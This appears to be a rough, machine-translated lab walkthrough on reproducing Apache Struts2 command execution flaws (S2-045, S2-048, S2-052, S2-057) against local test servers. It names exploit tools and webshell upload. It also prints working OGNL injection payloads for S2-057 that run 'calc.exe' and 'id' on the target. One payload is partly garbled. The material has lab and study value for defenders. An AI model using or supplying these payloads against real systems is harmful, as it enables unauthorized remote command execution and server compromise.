Remote Command Execution and Deserialization——Recovery of Struts Framework Command Execution Vulnerability

Struts framework full series of command execution vulnerability restoration

(Port default 8080)

Historical loopholes:

https://www.seebug.org/search/?keywords=struts2
s2 early comprehensive utilization tool (10-17 years high-risk vulnerability)
K8 struts2 EXP
fill in the target, you can execute commands, file upload (pony), connect the pony
appears .action or .do
may use structs2 framework

s2-045 vulnerability restoration (K8 is enough)

http://192.168.0.127:8080/struts2-showcase/showcase.action

s2-48 attack process restoration

struts2 S2-048 remote code execution vulnerability exp
C:> struts048.py http://192.168.32.95:8080/struts2-showcase/integration/saveGangster.action
struts048.py
struts.2.3.x version used by "ipconfig" Construct untrusted input in showcase plugin to implement remote command attack

S2-052 attack process restoration (for version struts 2.5-2.5.12)

Meterpreter (CVE-2017-9805) of Struts S2-052 exploit
https://www.cnblogs.com/Hi-blog/p/7510987.html
search struts2

S2-057 vulnerability recurrence (requires parameter alwaysSelectFullNamespace to be set to true)

Apache struts2 namespace remote command execution—CVE-2018-11776 (S2-057) vulnerability recurrence
http://192.168.0.127:8080/struts2-showcase//actionChain1.action

Reference article: https://blog.csdn.net/weixin_43625577/article/details/97111575
https://www.sinesafe.com/article/20180823/struts2057.html

Note:
First add in the struts.xml configuration file <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
Secondly modify the configuration file struts-actionchaining.xml Delete the namespace attribute, or use wildcards *
Finally change the type = "chain" to type = "redirectAction" (jump) for the
purpose of Turn the path into a controllable
attack payload :
http://192.168.0.127:8080/struts2-showcase/${(1+1)}/actionChain1.action

$ {#_ memberAccess = @ ognl.OgnlContext @ DEFAULT_MEMBER_ACCESS, @ java.lang.Runtime @ getRuntime (). exec ('calc.exe')} (execute the calculator of the remote server)

${
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec(‘id’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}